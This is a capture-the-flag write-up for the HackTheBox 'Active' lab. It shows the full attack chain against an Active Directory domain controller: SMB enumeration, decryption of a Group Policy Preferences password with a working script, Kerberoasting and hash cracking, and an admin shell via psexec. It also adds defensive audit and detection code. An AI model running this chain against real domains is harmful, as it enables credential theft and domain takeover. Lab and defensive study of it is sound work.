HackTheBox Active Writeup
Dive into the HackTheBox Active Capture The Flag (CTF) challenge, an easy-level journey into Windows Active Directory security. This concise writeup simplifies complex concepts, offering a clear path to understanding and exploiting common AD vulnerabilities.
Add Hosts
Edit the /etc/hosts file and add the following entry:
10.10.10.100 active.htb
This ensures that your system resolves the domain name active.htb to the correct IP address 10.10.10.100.
Script to add hosts automatically
ip="10.10.10.100"
domain="active.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV active.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-12 12:50 CEST
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.055s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-12 10:51:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-09-12T10:52:02
|_ start_date: 2024-09-12T10:47:26
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Samba Shares
smbmap -H active.htb
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk         Permissions   Comment
----         -----------   -------
ADMIN$       NO ACCESS     Remote Admin
C$           NO ACCESS     Default share
IPC$         NO ACCESS     Remote IPC
NETLOGON     NO ACCESS     Logon server share
Replication  READ ONLY
SYSVOL       NO ACCESS     Logon server share
Users        NO ACCESS
[*] Closed 1 connections
Access SMB Shares
Automatic Access Using smbclient
The Replication share allows anonymous (null-session) read access, so the whole share can be mirrored without credentials:
mkdir -p /tmp
cd /tmp
# Install the Samba client tools if smbclient is not already available
if ! command -v smbclient &>/dev/null; then
  if command -v pacman &>/dev/null; then
    sudo pacman -Syu samba
  else
    echo "Error: Could not find a suitable package manager to install samba."
    exit 1
  fi
fi
# Anonymous login (-N), recurse into every directory and download everything
smbclient //active.htb/Replication -N -c 'prompt; recurse; mget *'
Manual Access to Avoid Excessive Requests:
smbclient //active.htb/Replication -I active.htb -N
Files of Interest:
.
└── active.htb
    ├── DfsrPrivate
    │   ├── ConflictAndDeleted
    │   ├── Deleted
    │   └── Installing
    ├── Policies
    │   ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
    │   │   ├── GPT.INI
    │   │   ├── Group Policy
    │   │   │   └── GPE.INI
    │   │   ├── MACHINE
    │   │   │   ├── Microsoft
    │   │   │   │   └── Windows NT
    │   │   │   │       └── SecEdit
    │   │   │   ├── Preferences
    │   │   │   │   └── Groups
    │   │   │   │       └── Groups.xml   <- file with the encrypted (cpassword) password
    │   │   │   └── Registry.pol
    │   └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
    │       ├── GPT.INI
    │       ├── MACHINE
    │       │   └── Microsoft
    │       │       └── Windows NT
    │       │           └── SecEdit
    │       └── USER
    └── scripts
cd "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/"
more Groups.xml
Decrypt the Password
GPP Password Decryption
Pre-2012 Group Policy Preferences (GPP) passwords are AES-256 encrypted, but the protection is void because Microsoft published the AES key on MSDN. Any authenticated domain user can read SYSVOL, locate the preference XML files that carry a cpassword attribute, and decrypt them with that key.
- Vulnerability: the AES-256 key is public.
- Target: XML files in SYSVOL (the cpassword field).
- Decryption key: the AES key from MSDN.
#!/usr/bin/env python3
# Decrypt a Group Policy Preferences cpassword value.
# The key is the AES-256 key Microsoft published on MSDN, the IV is all zeros,
# and the plaintext is UTF-16LE with PKCS#7 padding (requires pycryptodome).
import base64
import binascii

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad


def main():
    try:
        key = b"\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
        iv = b"\x00" * 16
        b64_ciphertext = input("Enter the Base64-encoded ciphertext: ").strip()
        # cpassword values are stored without Base64 padding; restore it
        b64_ciphertext += "=" * ((4 - len(b64_ciphertext) % 4) % 4)
        print(f"Base64 ciphertext (with padding): {b64_ciphertext}")
        try:
            raw_ciphertext = base64.b64decode(b64_ciphertext)
            print(f"Raw ciphertext (decoded): {raw_ciphertext}")
        except (binascii.Error, ValueError) as e:
            print(f"Error decoding Base64: {e}")
            return
        cipher = AES.new(key, AES.MODE_CBC, iv)
        try:
            plaintext_padded = cipher.decrypt(raw_ciphertext)
            print(f"Plaintext (with padding): {plaintext_padded}")
            plaintext = unpad(plaintext_padded, AES.block_size)
            # GPP stores the password as UTF-16LE, not UTF-8
            print("Decrypted plaintext:", plaintext.decode("utf-16-le"))
        except ValueError as e:
            print(f"Decryption error: {e}")
    except KeyboardInterrupt:
        print("\nProcess interrupted by user. Exiting ...")


if __name__ == "__main__":
    main()
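The script above decrypts one cpassword value at a time. As an added example that is not part of the original writeup, the following Python scans a downloaded SYSVOL copy (such as the Replication share mirrored with smbclient) for any Group Policy Preferences XML file that still carries a cpassword attribute. This is the audit a domain administrator would run to find and remove such entries; it reports where credentials are stored and does not decrypt them. The directory layout and the Groups.xml content are constructed for the demonstration (the cpassword value is a placeholder, the GPO GUID is the one seen in the share listing), and the set of file names is the one the GPP client-side extensions write.

```python
#!/usr/bin/env python3
"""Audit a SYSVOL copy for Group Policy Preferences files that embed cpassword.

Added example for this writeup, not code from the original post. It only
reports where a cpassword attribute is present; it does not decrypt anything.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP files that can embed credentials; all use the same cpassword attribute.
GPP_FILES = {
    "Groups.xml", "Services.xml", "ScheduledTasks.xml",
    "DataSources.xml", "Drives.xml", "Printers.xml",
}

# Constructed sample in the shape of a GPP Groups.xml. The cpassword value is a
# placeholder, not a real ciphertext from the box.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS"
        image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_BASE64_CIPHERTEXT"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""


def scan_gpp_file(path):
    """Return one finding per element in `path` that carries a cpassword attribute."""
    findings = []
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return findings  # malformed XML cannot be applied by the GPP client
    # cpassword sits on a <Properties> child; the timestamp sits on its parent.
    for parent in root.iter():
        for child in parent:
            cpassword = child.get("cpassword")
            if cpassword is None:
                continue
            # Different GPP files name the account attribute differently.
            account = (child.get("userName") or child.get("accountName")
                       or child.get("runAs") or "")
            findings.append({
                "file": path,
                "element": child.tag,
                "user": account,
                "changed": parent.get("changed", ""),
                "cpassword_len": len(cpassword),
            })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy and collect cpassword findings from known GPP files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                findings.extend(scan_gpp_file(os.path.join(dirpath, name)))
    return findings


def build_sample_tree():
    """Write the constructed Groups.xml into a temp dir shaped like the share."""
    base = tempfile.mkdtemp(prefix="sysvol_audit_")
    gpo = os.path.join(base, "active.htb", "Policies",
                       "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                       "MACHINE", "Preferences", "Groups")
    os.makedirs(gpo)
    with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return base


def demo():
    """Build the sample tree and return the findings for it."""
    return scan_sysvol(build_sample_tree())


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}: <{f['element']}> for {f['user']} "
              f"(changed {f['changed']}, cpassword length {f['cpassword_len']})")
```

Point `scan_sysvol()` at the directory smbclient created (here /tmp/active.htb) to audit a real copy; every finding is an entry that should be removed from the policy and whose account password should be rotated.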
Perform Kerberoasting
Get the Ticket:
PASSWORD="<password>"
# Confirm the recovered SVC_TGS credentials work against SMB
smbmap -H active.htb -u SVC_TGS -p "$PASSWORD"
# List accounts that have an SPN set, then request a service ticket for each
GetUserSPNs.py -dc-ip active.htb active.htb/SVC_TGS:"$PASSWORD"
GetUserSPNs.py -dc-ip active.htb active.htb/SVC_TGS:"$PASSWORD" -request
Crack the Ticket Hash:
echo '<ticket>' > ticket.txt
john --format=krb5tgs --wordlist=/usr/share/dict/rockyou.txt ticket.txt
rm -f ticket.txt
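From the defensive side, the GetUserSPNs run above appears on the domain controller as a burst of Security event 4769 (Kerberos service ticket requested) records. As an added example that is not part of the original writeup, the following Python applies the two standard Kerberoasting indicators to such records: a ticket requested with RC4-HMAC (TicketEncryptionType 0x17) for a service account that is a user rather than a machine account, and one client requesting tickets for several distinct service accounts within a short window. The event records are constructed to match the 4769 field names (the service names other than Administrator, the client addresses and the timestamps are made up); the function names and thresholds are assumptions.

```python
#!/usr/bin/env python3
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769 records.

Added example for this writeup, not code from the original post. The records
below are constructed to mirror the 4769 fields TargetUserName, ServiceName,
IpAddress and TicketEncryptionType; no real logs were used.
"""
from collections import defaultdict
from datetime import datetime

RC4_HMAC = "0x17"            # 0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96
IGNORED_SERVICES = {"krbtgt"}  # TGT renewals are not service-ticket requests of interest

# Constructed sample records. Machine accounts end with '$'; a Kerberoasting
# tool requests RC4 tickets for every user account that carries an SPN.
SAMPLE_EVENTS = [
    {"time": "2024-09-12T10:55:01", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "DC$", "IpAddress": "10.10.10.100", "TicketEncryptionType": "0x12"},
    {"time": "2024-09-12T10:55:03", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "IpAddress": "10.10.14.5", "TicketEncryptionType": "0x17"},
    {"time": "2024-09-12T10:55:03", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_sql", "IpAddress": "10.10.14.5", "TicketEncryptionType": "0x17"},
    {"time": "2024-09-12T10:55:04", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_backup", "IpAddress": "10.10.14.5", "TicketEncryptionType": "0x17"},
    {"time": "2024-09-12T11:30:00", "TargetUserName": "jdoe@ACTIVE.HTB",
     "ServiceName": "krbtgt", "IpAddress": "10.10.10.50", "TicketEncryptionType": "0x12"},
]


def suspicious_rc4_requests(events):
    """Records where an RC4 service ticket was requested for a user (non-machine) account."""
    return [
        e for e in events
        if e["TicketEncryptionType"] == RC4_HMAC
        and not e["ServiceName"].endswith("$")
        and e["ServiceName"] not in IGNORED_SERVICES
    ]


def burst_requesters(events, window_seconds=60, min_services=3):
    """Map client IP -> sorted service names for clients that requested RC4 tickets
    for at least `min_services` distinct service accounts inside one window."""
    by_client = defaultdict(list)
    for e in suspicious_rc4_requests(events):
        by_client[e["IpAddress"]].append((datetime.fromisoformat(e["time"]), e["ServiceName"]))
    hits = {}
    for ip, items in by_client.items():
        items.sort()
        # Slide the window start over each request and count distinct services in it.
        for i, (t0, _) in enumerate(items):
            names = {svc for t, svc in items[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(names) >= min_services:
                hits[ip] = sorted(names)
                break
    return hits


if __name__ == "__main__":
    for ip, services in burst_requesters(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting from {ip}: RC4 tickets for {', '.join(services)}")
```

On a real domain the RC4 indicator alone is noisy where legacy clients remain, which is why the burst count is combined with it; the mitigation side is to move service accounts to AES-only tickets, long random passwords or group Managed Service Accounts so a captured ticket is not crackable.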
Use the Found Admin Password:
PASSWORD="<password>"
smbmap -H active.htb -u Administrator -p "$PASSWORD"
smbclient //MOUNT/Users -I active.htb -U "Administrator%$PASSWORD" -c "more Administrator\Desktop\root.txt"
Get a Shell
psexec.py administrator@active.htb